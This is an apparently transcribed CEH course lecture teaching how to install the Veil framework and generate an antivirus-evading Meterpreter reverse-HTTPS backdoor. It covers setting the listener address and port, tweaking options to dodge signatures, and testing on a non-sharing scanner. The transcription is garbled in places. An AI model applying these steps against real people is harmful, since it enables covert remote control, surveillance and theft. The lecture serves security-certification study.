EC Council CEH 312-50 V11 Topic: Gaining Access – Client Side Attacks Part 1
December 19, 2022

1. Installing Veil Framework

In this section, we’re going to start talking about client-side attacks. So most of the time, it’s better to try to gain access to your target using server-side attacks. So try to find exploits in the operating system and in the applications installed. If you tried that and it didn’t work, or if your target is hidden behind an IP, So, if the target person is not on the same server as us or on the same network as us, and if the target person is using a network, so if you ping their IP, you won’t be able to reach it because they’re hidden behind the router or behind a network, then client-side attacks are your next option. So these attacks require the user to do something.

So the user is going to have to open a link; they’re going to have to install an update; they’re going to have to install a picture or open a picture; they have to interact; they have to do something. And once they do it, we will be able to run code and achieve our goal. Therefore, because it requires user interaction, information gathering is very important in this case. And we don’t only need to get information about the installed applications; we also need to know the person, their friends, the networks they use, the websites they use, and if there are any websites that they frequently use and trust. Therefore, the information gathering section here is going to be focused on the person rather than on the applications and the operating system.

So I also want to show you my lab for this. So obviously we’re going to be using the Cali machine for the attacking, and the victim or target is going to be using the Windows machine. So again, I’m just going to go over the networks just to show you that they’re both on the same network; they’re both using the 1020-14 Nat, and if we go here, we have a Nat network as well, and it should be the 1020-14 as well. So both devices are on the same network, but it really doesn’t matter even if they’re on different networks; these attacks will work anyway. We’re going to be using reverse connections for most of them, so the target doesn’t really need to have a separate real IP address.

2. Veil Overview & Payloads Basics

In this lecture, we’re going to learn how to generate an undetectable backdoor. A backdoor is just a file that, when executed on the target computer, will give us full access to that computer. So it’ll basically allow us to hack it and do anything that we want on that computer. There are a number of ways to generate back doors, and what we’re interested in is generating a backdoor that is not detected or detectable by antivirus programs. Now this is not very hard to achieve, as you’ll see, and we’re going to do this using a tool called the Vill Framework. Now, first of all, we’re going to have to install this framework. There is an installation script in the spectrum’s resources that you can use to automatically install and configure it. I already have it downloaded right here in my downloads, as you can see right here; it’s called Install Bill.

So I’m simply going to open up my terminal and go navigate to my downloads using the CD command. So CD downloads, and if we do LS, we can see this file right here, the installation script. By the way, feel free to double-click it and see the contents of it. It simply has a number of commands to install dependencies, download Linux, and configure it properly. So to run this script, first of all we have to change its permissions to unexcitable, and to do that we’re going to use the Schmidt command. We’re going to do +X to add executable permissions. And the file that we need to add executable permissions to is this file right here. This file right here is called Install Ville. So we’re basically using the shod command to change permissions.

We’re adding executable permissions to this specific file. We’ll press enter, and the commands will run without error. That means the command was properly executed. So if we do LS again to list files, you’ll see the file listed in green, meaning it is an executable. And to run an executable in Linux, we always use a forward slash followed by the executable name. So I’m just going to type in tab to autocomplete, and we have the name right here. So we’re simply running this file as an executable by adding to it, and I’m going to hit enter to run it. I’m going to maximise this, and you want to give this its time. You want to make sure that you have Internet access because, as I said, it’s going to download and install VMware. Ville is a massive framework. That’s why I actually didn’t include it in the custom image because it’s really, really big. So you want to give it its time. Make sure you have a stable internet connection so you can download and install everything. And if you face any issues, just take a screenshot of the error and post it in the Q&A or in the forums, and we will be happy to help you.

Now, I’m going to pause this video, and we’ll resume once the installation is complete. Now, during the installation, you may receive a message asking if it should automatically restart Services during the upgrade. To say yes and continue the installation, navigate with the left arrow, hover over the yes, and press the Enter key on the keyboard. Now, during the installation, you might actually get messages on the terminal telling you to go through a prompt and click Next. Next. Ignore them. You don’t need to do anything. The script will do everything for you. So you literally need to wait for it to do everything. and that’s about it. Perfect. Now the installation is complete. I’m just going to clear the screen, and if we just type the tool name Veil and hit Enter, you’ll see that the programme will run with no issues at all. Now, in the next lectures, I’m going to show you how to use this programme to generate undetectable backdoors that can be used to hack Windows computers.

3. Generating An Undetectable Backdoor

Okay, now that we have Ville loaded, you can see it. Show us the main commands that you can use with Ville. So you can do exit to exit as the first command. You can do a search for information about a specific tool. You can make a list to list the available tools. You can update Ville. And this is very, very important because you always want to be up to date when it comes to bypassing antivirus programs. Then you can employ a tool. Now, let’s start using ville evasion. And as we do it, it’s going to become so easy that you’ll be able to understand it more. Now, Ville has two main tools. And if we do a list, you’ll be able to see them. So we have the first one, which is the one that we’re interested in, which is called evasion. And that’s the one that generates undetectable backdoors for us. And then there’s the second one, which is called the ordinance. And this tool generates the payloads that are used by Evasion. So you can look at this as a helper or a secondary tool.

Now, what I mean by a payload is that a payload is the part of the code of the backdoor that does the stuff that we want—that does the evil stuff, if you want to say so. It’s the part of the code that gives us a reverse connection. It’s the part of the code that downloads and executes something on the target computer. It’s the part of the code that allows us to achieve what we want by executing that file. And this is going to become more clear as we start using Ville. Now, for now, we’re interested into using Evasion. So we’re going to use one. because it is the first and most important tool. And as you can see, we have Ville Évasion loaded now. And as I said before, this used to be a standalone tool that you just downloaded on its own. But now they have it all combined together. Now, as you can see, the first thing that we get when we load Ville Évasion are the commands that you can run on this tool. So the first thing that we want to do is list all the available payloads. And as you can see, we have 41 different payloads. And all of these payloads follow a certain naming pattern. And you can see, for example—let’s take this example right here. because that’s the payload that I’m going to be using.

You can see the payload is divided into three parts. The first part right here refers to the programming language that the payload is going to be wrapped in. So we have the evil code. And then the evil code is going to be wrapped in a certain programming language that the target computer understands. And right here you can see that this payload uses the Go programming language. We can see this one uses C. We can see that these ones use CS. We have Python, we have PowerShell, and we have Ruby. If we scroll down, the second part of the payload is really important. This is the type of payload and the type of code that’s going to be executed on the target computer. In this example, we’re using Meterpreter, which is a payload designed by Metasploit. Metasploit is a huge framework for hacking, and it allows you to do a lot of things. But in this lecture, we’re focusing on creating a payload called a meterpreter. And what’s really cool about Meterpreter is that it runs in memory and allows us to migrate between system processes. So we can get the payload or backdoor running from a normal process, such as Explorer. And this payload will allow us to gain full control over the target computer.

So we’ll be able to navigate through the file system, download and upload files, turn on the microphone and the webcam, even use that computer to hack other computers, and install a keylogger. You can literally do anything you can think of. And all of this will be running from memory, from a normal process on the system. So it’s very hard to detect, and it doesn’t leave a lot of footprints. That’s why it’s a really, really cool payload, and we’ll be using it a lot. The third part of the name is the method that’s going to be used to establish the connection. So in here, you can see that this is called Rev HTTP. So Rev stands for reverse. And HTTP is the protocol that’s going to be used to establish the connection. So we can see that this payload will create a reverse HTTPS connection. You can see this one right here, for example. It creates a reverse HTTP connection. And we have this one in here that creates a reverse TCP connection. Now, what I mean by “reverse” is that the connection is going to come from the target computer to my own computer.

So I won’t be connecting to the computer that I want to hack. What’s going to happen is that once the person double-clicks the back door, the back door will connect back to me from the target computer. What’s cool about this is I’ll be able to bypass antivirus programmes because the connection is not going to the target computer; it’s coming back to my computer. So it’s literally as if the target person is just connecting to a normal website. I’m going to use a port that websites use, which is 80 or 80 80. So again, if the person analyses the connection, it’ll look as if they’re literally just connecting to a normal website. Also, if the target computer is hidden behind a router or behind a network, this is going to work because the connection is coming from the target computer to me instead of me connecting to the target computer. So using a reverse connection is really, really handy. And I think this is really the only practical way of gaining access to a computer because there are a lot of things that can prevent you from connecting to a certain computer. Now, this is the general naming pattern.

You’ll see some payloads, like this one right here, that don’t follow that general naming pattern. And what these payloads essentially do, for example, you can see this one is called Shellcode inject. So what it’s going to do is create a payload that injects your other payload. So it’s going to create a normal payload, and that normal payload injects a meterpreter payload. For example. Now it does this to try to bypass more security. However, they usually want to bypass more things than normal payloads would. So that’s why I usually just use one of the normal payloads in here. So this is it. This is all about the payloads. Sorry, I took a bit of time, but I wanted to make sure that you guys understood the naming pattern. I wanted you to understand what a payload is and the difference between a reverse, a bind, and a TCP payload. This way, the rest of the course will become more clear to you, and I can just use the payload that I want without explaining what it is. Now in the next lecture, we’re going to be generating a payload and testing it against antivirus programs.

4. Listening For Incoming Connections

Okay, so in this video, we’re going to be using Ville to create a backdoor. So the first thing I’m going to do is make a list of the available tools, and I’m going to use number one because we want to use Evasion. And then I’m going to list my payloads. And, as I mentioned in the previous lecture, I want to use Go meterpreter reverse Https, so number 15 is assigned. So I’m going to use 15. And that will list the first thing; it will show me information about this specific payload, and then it will show me the options that I can set for this payload. So the main option that you want to set, and the most important one, is the IP address. So this is the IP address at which you’re going to be receiving the connections on.As we said, we’re going to have a reverse connection, and we need to set the IP address that the payload or the back door will try to connect to.

And in our case, we want to receive the connection back to this Kali machine. So we’re going to set the IP address to the IP address of the current Kali machine. Now, to get the IP of my California machine, I have to run if config. So I’m going to split the screen by doing a right click and clicking on “split horizontally.” And I’m just going to bring this down a bit, and we’re going to run ifconfig. Now you can see the IP address, which is 1020 14 213 in this case. This is the IP of my Kali machine. This is the IP of the machine that I’m using as the attacking machine. So this is where I want the connection to come back to so I can hack the target computer once the back door is executed. So I’m going to set Lost to 1020, 14 to 13. So you can set any of these options using the Set command. So all you have to do is type “Set followed by the option to change.” So in this case, we want to change the Lost, and we want to change that to 1020, 14 to 13.

Now the L port is set to 80, which is really good because that’s the port that’s used by web servers. So as I said, the connection will look as if the target person is connecting to a website, and it’s not going to be suspicious. But I don’t want to use that port because I’ll have a web server running on it, and we’ll talk about that later. So I’m going to change that to 80. 80.80 is another port that’s used by web servers, so it’s still not suspicious and it should still bypass firewalls. So I’m just going to do Set the same way we did the Lhost before. We’re going to do Lport to the value that we want to set this option to, and we’re going to set it to 80 80.Now, if I do options again to list all the options, you’ll see that the Lhost changed to 1020, 14 to 13, and the Lport changed to 80 80. Now, if you generate the back door like this, you will bypass all antivirus programmes except AVG. I’ve already tried this.

That’s how I know this. And that’s not good enough because we want to bypass everything. Now, the way antivirus programmes work, they have a very large database of signatures. These signatures correspond to files that contain harmful code. So they compare the signature of your file, your backdoor, to all of the files in this massive database. If your file matches any of these files, then they’ll flag it as a virus or malware. If it doesn’t, then they’ll think that it’s a normal file and not malware. So the main point here is that we’re going to try to modify the file, our backdoor, as much as possible to make it more unique so that it bypasses the signature database and will be able to bypass antivirus programs. Now, as I said, Ville is already doing that for us. It’s encrypting the back door. It’s obfuscating it and injecting it into memory so that it doesn’t get detected. and it’s doing a good job at it. It’s bypassing pretty much everything except for one antivirus program. So just to bypass this last antivirus program, I’m going to set some optional options that really won’t make much of a difference. They’ll just make the back door look a bit different.

So the first thing I’m going to change is the processors. And that’s the minimum number of processors to be used by the back door. I’m not going to set a huge number because that’ll just make my back door not work. I’m just going to set it to one, which is pretty much nothing, really. But I’m just going to set this option to make the code look a bit different. So I’m going to do it again the same way that we are setting the Lport and the Lhost. We’re just going to put the option name, which is “processors,” and we’re going to set that to number one. And I’m also going to set another option, which is the sleep option. And that essentially puts the back door to sleep for the number of seconds you specify before it executes the evil code you have in there before executing the payload. So I’m going to set this to six. There is no real reason for this, once again. I’m only doing this to make the back door look a bit different. So I’m going to set sleep to six. So I’m going to hit enter, and I’m going to do options again to make sure that all the options are set the way I want them to be. So I have my IP address set properly. I have my airport, I have my processors, and I have my sleep. So I’m going to generate the backdoor. And now it’s asking me to name this backdoor something. So I’m going to name this backdoor “rev https at 80” just so that we can remember which payload and which port to use for this backdoor in the future. Now, the backdoor is generated, and you can see that it’s telling us the module that’s used and telling us where the backdoor is stored. So the back door is kept right here in this path.

So I’m going to copy that. Let’s go ahead and check to see if the back door is detected by any antivirus programs. Now, you can use the built-in feature of Vill using the Czech VT command. But this feature only uses the signature of the file, and it’s not 100% accurate. Sometimes it tells you that the file will bypass all antiviruses, but it’ll actually be detected. You can also use VirusTotal, but I don’t recommend that. And please don’t do that because if you do that, your back door will become less effective because VirusTotal shares the results of their scans with antivirus programs. We’re going to use a website called No Distribute for this. So we’re going to go to it now. So I’m just going to Google “Nordistribute” and see what this is going to do. It’s similar to VirusTotal. The only difference is it’s not going to share these results with antivirus programmes, so it won’t affect your backdoor. So I’m going to click on Browse to navigate to my file. and I’m just going to copy where the file is stored. So Ville is telling me now that it’s stored in this location and the user share will be compiled.

So I’m going to copy this and I’m going to come here, I’m going to click on the pen, and I’m going to paste the location. I’m going to click on “Open” and scan the file. I’m going to include a link to this website in the resources of this lecture, along with an alternative in case it didn’t work for you. And as you can see, the file is bypassing all antivirus programs. So we can use this backdoor against any device, and we’ll be sure that the device or the computer will not be able to detect this file as a virus. Now, please keep in mind that you won’t always get perfect results like this. Antivirus programmes always update their databases, and VICE also always updates the way they generate backdoors. So it’s pretty much a full cycle. Ville is always trying to bypass antiviruses, and antiviruses are always trying to detect the latest backdoors. So first of all, you want to make sure that you’re using the latest version of Ville, and you’ll have to experiment with the different payloads and different options until you get it to work.

This is the most basic method of generating undetectable backdoors. I actually cover more advanced methods in my social engineering course and in my Python course, where I actually show you how to write your own backdoor, which is the best method. But these methods are more complex, and this course is designed to be a general one that will introduce you to most hacking fields without diving deep into any of them. So if you want to learn more advanced methods of bypassing antivirus programs, then check out these courses in the bonus lecture, the last lecture of the course. But anyway, you don’t need to worry about this for now. If you can’t get it to bypass a lot of antivirus software, you can simply disable Windows Defender or the antivirus in the target Windows machine for testing, just to get an idea of how to generate backdoors and interact with them. And then, if you want to learn more, you can check out these other courses because these other courses will build on what you’re going to learn here, so you’ll have to learn these skills in here. Anyway, also check out the YouTube video in the resources of this lecture to get a taste of what these methods look like and how effective they are.

Leave a Reply

How It Works

Step 1. Choose Exam
on ExamLabs
Download IT Exams Questions & Answers
Step 2. Open Exam with
Avanset Exam Simulator
Press here to download VCE Exam Simulator that simulates real exam environment
Step 3. Study
& Pass
IT Exams Anywhere, Anytime!